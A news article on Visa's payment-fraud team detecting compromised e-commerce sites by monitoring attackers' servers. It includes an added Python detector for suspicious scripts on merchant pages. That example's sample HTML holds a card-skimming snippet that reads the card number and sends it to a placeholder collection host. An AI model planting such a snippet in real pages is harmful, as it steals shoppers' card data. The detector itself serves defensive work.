Visa turns a problem upside down to find malware
By Dzof Azmi May 29, 2018
- Observes the communication behaviour of malicious central servers to find potential victims
- Analysis of 255 malicious servers led to the discovery of 2,366 previously unidentified compromises
VISA'S never-ending fight against fraud has moved up another notch. Attackers are migrating from targeting brick-and-mortar sites to online e-commerce systems.
But this new battleground has given an opportunity for the company to detect potential breaches in a new way. "We now don't need fraud reported to find breached websites," announced Penny Lane, Visa's VP of Payment Fraud Disruption (PFD), Global Risk at the recent Visa Security Summit in Singapore.
Currently, the majority of compromised merchants are identified after card users have made reports of fraud. The credit card company analyses the data and tries to identify a common point of purchase - which can take up to several months.
What Visa PFD is doing now is radically different. They are observing servers controlled by attackers, and using traffic analysis to identify business websites that have been compromised - which usually comes as news to the business owners.
An online wiretap
However, these malicious central servers are a weakness that Visa PFD can exploit. Once such a server has been identified, they can observe it to see if the server connects to a legitimate business site, and then analyse the site to see if malware is present.
"When we go into the sites, we're not in any way hacking the merchant sites or using any privileges to get there," said Lane, explaining that they just look at the source code for the website. "It's the equivalent of driving by someone's house and seeing what colour it is."
If any signs of intrusion are detected, they will contact the business owner and advise accordingly.
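As an added illustration of the "look at the source code" step described above (example code written for this article, not Visa PFD's tooling), the check below parses a merchant page's HTML and lists hosts that its scripts load from, or that inline scripts touching card fields send data to, other than the merchant's own host and an allowlist of expected third parties. The hint words, host names and sample HTML are constructed assumptions.

```python
# Added example, not Visa PFD's tooling: static look at a merchant page's HTML
# for scripts that load from, or post card data to, hosts other than the
# merchant's own. Hint words and sample HTML are constructed assumptions.
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

CARD_HINTS = re.compile(r"card|cvv|cvc|expir", re.I)          # touches payment fields
SEND_HINTS = re.compile(r"XMLHttpRequest|fetch\(|sendBeacon|new Image")  # sends data out
URL_RE = re.compile(r"https?://[^\s'\"]+")

class ScriptCollector(HTMLParser):
    """Gather <script src=...> URLs and inline <script> bodies."""
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script = True
                self.inline.append("")
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def suspicious_hosts(html, site_host, allow=()):
    """Hosts that scripts load from or send to, excluding the merchant's own
    host and an allowlist of expected third parties (e.g. its payment provider)."""
    p = ScriptCollector()
    p.feed(html)
    known = {site_host, *allow}
    hosts = {urlparse(s).hostname for s in p.external}
    for body in p.inline:                      # inline code that both reads card
        if CARD_HINTS.search(body) and SEND_HINTS.search(body):   # fields and sends out
            hosts.update(urlparse(u).hostname for u in URL_RE.findall(body))
    return sorted(h for h in hosts if h and h not in known)

SAMPLE_HTML = """<html><body>                        <!-- constructed sample -->
<script src="/static/checkout.js"></script>
<script src="https://psp.example/v3.js"></script>
<script>
var pan = document.getElementById('cardNumber').value;
fetch('https://stats.example/collect?d=' + btoa(pan));
</script></body></html>"""
```

Running `suspicious_hosts(SAMPLE_HTML, "merchant.example", allow=("psp.example",))` leaves only the unexpected collection host for an analyst to follow up on.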
A case study
In real life, their trials so far have shown positive results. In one example given, they received a tip that a pizza restaurant’s online ordering system had been breached.
By monitoring connections it made, they then realised it was a service provider breach and that 500 of the 1,500 clients connected to it were compromised by the same malware.
The pizza shop's and the service provider's systems were patched within eight business days. By analysing server transactions, it was determined that the original attack occurred 23 days earlier, but the issue was resolved without a single case of fraud being reported.
Lane estimated that, had this threat gone undetected, it could have exposed 225,000 accounts per month. Turning a problem upside-down, it seems, works.
"We're going from the bad guys and find our way down, rather than from the money lost and going back up," said Lane.
Greater threats ahead
Lane said that the programme is still in its early stages, but the results look promising. As of this moment, an analysis of 255 malicious servers led to the discovery of 2,366 previously unidentified compromises in nine months. "Frankly, we're overwhelmed by the number of breached websites we've found."
Apart from the skimming described earlier, Visa PFD also discovered malware that uses your computer's resources for crypto mining, and even malware capable of infecting devices (by using a popup requesting that users "update" a popular browser plug-in).
With the potential volume and complexity of the threat that faces them, Lane admitted that the eventual aim will be to have the whole workflow automated. She also stressed that this was only one of several initiatives run by Visa PFD to neutralise the threats facing them.
"We're going after the threat actors, we're trying to keep them on their toes as much as possible, we're disrupting their activities, we're going after them with law enforcement."